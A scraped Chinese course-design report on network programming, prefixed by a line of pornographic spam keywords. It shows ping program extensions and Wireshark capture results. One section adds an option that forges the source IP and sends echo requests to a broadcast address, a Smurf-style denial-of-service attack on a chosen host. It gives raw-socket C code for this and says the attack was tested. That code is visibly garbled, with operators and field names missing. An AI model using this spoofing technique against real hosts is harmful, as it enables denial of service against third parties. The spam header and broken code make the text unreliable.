freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

計算機網(wǎng)絡(luò)課程設(shè)計(1)-資料下載頁

2025-01-13 18:05本頁面
  

【正文】 頭自身的大小,所以整個參數(shù)最大的設(shè)置值為65400。又因為在網(wǎng)絡(luò)中有MTU的概念,也就是能單獨發(fā)送的包的最大值由整個這條網(wǎng)絡(luò)中的最小包大小決定,我們的這個MTU為1500,而且大部分一般都為1500,所以,在不拆分分組的情況下的最大值是1472。最小值當(dāng)然是8了,因為我們得用它來記錄這個分組發(fā)送的時候的時間。具體實現(xiàn)如下:在處理命令行函數(shù)中加入如下代碼:case 39。s39。: datalen=atoi(optarg)。 if(datalen8) err_quit(The datalen value is too small! It must bigger than 8!)。 else if(datalen 1472 amp。amp。 datalen 65400) printf(The datalen value is bigger than MTU(1500),so you may not be sucess!\n)。 else if(datalen 65399) err_quit(The datalen value is too big!)。 break。這樣datalen的值就變成了用戶期待的那個數(shù)據(jù)包的大小了。在不同的應(yīng)用中,我們常常需要不同的服務(wù)類型,例如在ftp下我們就需要最大吞吐量的類型,在telnet下我們就需要最小延遲的類型。所以,我們設(shè)計了o的選項,在它后面加一個數(shù)字的參數(shù),指定要用到得類型,然后我們的程序就根據(jù)這個參數(shù)去對自己進(jìn)行優(yōu)化,使我們的程序運行的更符合用戶的要求。具體實現(xiàn)如下:在命令行處理函數(shù)中加入如下代碼:case 39。o39。: temp=atoi(optarg)。 if(temp3 |temp0) err_quit(The server type is not exist!)。 server_type=server_types[atoi(optarg)]。 en_server_type=1。 break。server_type記錄著用戶指定的類型,在后面調(diào)用setscketopt函數(shù)對所創(chuàng)建的套接字進(jìn)行設(shè)置。在readloop函數(shù)中,加入如下代碼:if(en_server_type) setsockopt(sockfd,IPPROTO_IP,IP_TOS,amp。server_type,sizeof(int))。這樣對類型的設(shè)置就完成啦。我們都知道可以給你一個廣播地址發(fā)送一個回射請求,這樣所有處于這個廣播地址的局域網(wǎng)中的電腦都會給源主機發(fā)一個回射響應(yīng),要是這個局域網(wǎng)非常龐大的話,那么這個回應(yīng)的數(shù)量就是非??植赖模敲淳涂梢詫@臺源電腦造成非常大的攻擊。我們可以通過這個選項將我們的ip地址換成要攻擊的主機的ip地址,然后向一個廣播地址發(fā)請求,這樣就可以起到攻擊的作用。所以,我們設(shè)計的r選項,在它的后面加一個ip地址,指定要替換為的攻擊目標(biāo)的ip地址。集體實現(xiàn)如下:在命令行處理函數(shù)中加入如下代碼:case 39。r39。: inet_aton(optarg,amp。)。 en_false_source_addr=1。 break。這樣。改寫發(fā)送數(shù)據(jù)包的函數(shù)如下:Void send_v4(void){ int len。 int head_len。 struct icmp *icmp。 struct ip *ip。 if(en_false_source_addr) { head_len=sizeof(struct ip)+ sizeof(struct icmp)。 ip=(struct ip *)sendbuf。 ipip_v=IPVERSION。 ipip_hl=sizeof(struct ip) 2。 ipip_tos=server_type。 ipip_len=head_len+datalen。 ipip_id=0。 ipip_off=0。 ipip_ttl=ttl。 ipip_p=IPPROTO_ICMP。 ipip_sum=0。 ip=inet_addr(prsasendsa_data)。 ip=。 icmp= (struct icmp *)(sendbuf+sizeof(struct ip))。 } else icmp = (struct icmp *) sendbuf。 icmpicmp_type = ICMP_ECHO。 icmpicmp_code = 0。 icmpicmp_id = pid。 icmpicmp_seq = nsent++。 gettimeofday((struct timeval *) icmpicmp_data, NULL)。 len = 8 + datalen。 /* checksum ICMP header and data */ icmpicmp_cksum = 0。 icmpicmp_cksum = in_cksum((u_short *) icmp, len)。 if(en_false_source_addr) len+=sizeof(struct ip)。 sendto(sockfd, sendbuf, len, 0, prsasend, prsalen)。}這樣就完成了修改源ip地址的所有工作,我們就可以對目標(biāo)主機進(jìn)行攻擊啦。七、實驗數(shù)據(jù)、結(jié)果分析實驗一的結(jié)果分析在實驗一中做的實驗大部分是在運用抓包工具wireshark的各項功能,所以大部分的實驗數(shù)據(jù)與結(jié)果都是圖片,在下面就將采用數(shù)據(jù)結(jié)果圖配合分析描述的方法進(jìn)行介紹實驗產(chǎn)生的數(shù)據(jù)與實驗說的出的結(jié)果。上面就是我們的工具程序的主界面和網(wǎng)卡設(shè)置對話框的主界面,在設(shè)置對話框的左上部分有一個Capture packets in promiscuous mode的選項,這個被選中就是表示把這塊網(wǎng)卡設(shè)置為混雜模式。這時便開始獲取數(shù)據(jù)包了,在狀態(tài)欄我們可以看到現(xiàn)在接受到多少個包和當(dāng)前顯示了多少了。 這是在訪問百度主頁之前的抓包,顯示沒有。 這是在我們用瀏覽器訪問了一下百度主頁后的數(shù)據(jù)包篩選結(jié)果,可以看到已經(jīng)有好幾個數(shù)據(jù)包被用來我們的主機與百度主頁之間的通信了。從這兩個的對比可以看出用過濾語句對所抓的包進(jìn)行過濾是多么好的一個技術(shù)。IP報文:版本:4 頭長度:20bytes 服務(wù)類型:0x00 總長度:40 標(biāo)識:0x6d17標(biāo)志:0x02 片偏移:0 生存時間:54 協(xié)議:TCP(6)頭校驗和:0x979a 源IP地址: 目的IP地址: THERNET II報文:目標(biāo)地址:Quantami_10:52:8d(20:7c:8f:10:52:8b)源地址:TpLinkT_27:80:d4(e0:05:c5:27:80:d4)類型:IP(0x0800)UDP報文:UDP源端口:capioverlan(1147)UDP目的端口:33674(33674)長度:28UDP校驗和:0x82a6數(shù)據(jù)Data:100000002c31b691ac4f7612341316fb198bb732TCP報文:源端口號:(80) 目的端口:imyx(1143) 順序號字段:57288確認(rèn)號字段:604 頭部長度:20bytes 保留域:0x11(FIN,ACK)窗口大?。?168 TCP校驗和:0xba44ICMP報文:類型:8 (Echo (ping) request) ping 請求代號:0 ( )校驗和:0x3d5cID:0x0200包序號:3584 (0x0e00) 這是沒有過濾條件的統(tǒng)計,所以也就是統(tǒng)計所有抓到得包。 這是統(tǒng)計所以ipv4的數(shù)據(jù)包的信息。實驗二Ping程序的結(jié)果分析此處設(shè)置了發(fā)送5次。這時設(shè)置的是每兩秒發(fā)送一個,顯然屏幕輸出的接收信息也變成每兩秒打印一次。第一個設(shè)置為20跳的時候,有返回,說明到百度的服務(wù)器之間需要路由小于等于10次,第二次設(shè)置為19跳的時候,就沒有返回啦,說明到百度的服務(wù)器之間需要路由大于等于19次,所以就可以知道到百度的服務(wù)器之間需要路由20次。加上q選項就開啟了安靜模式,這種模式下屏幕不會把所有接收到得數(shù)據(jù)包的分析結(jié)果都打印出來,而只是在最后打印統(tǒng)計信息。第一個是把自己的源地址設(shè)置為源地址,那樣就可以返回來,第二個是把另外一個源地址設(shè)置為源地址就不會返回發(fā)送的包了,包就返回給我們設(shè)置的地址了。這樣ping一個大的廣播地址就可以造成DOS攻擊,可以讓一個主機陷入繁忙的回射回應(yīng)的處理中,而不能正常運行。
點擊復(fù)制文檔內(nèi)容
環(huán)評公示相關(guān)推薦
文庫吧 www.dybbs8.com
備案圖鄂ICP備17016276號-1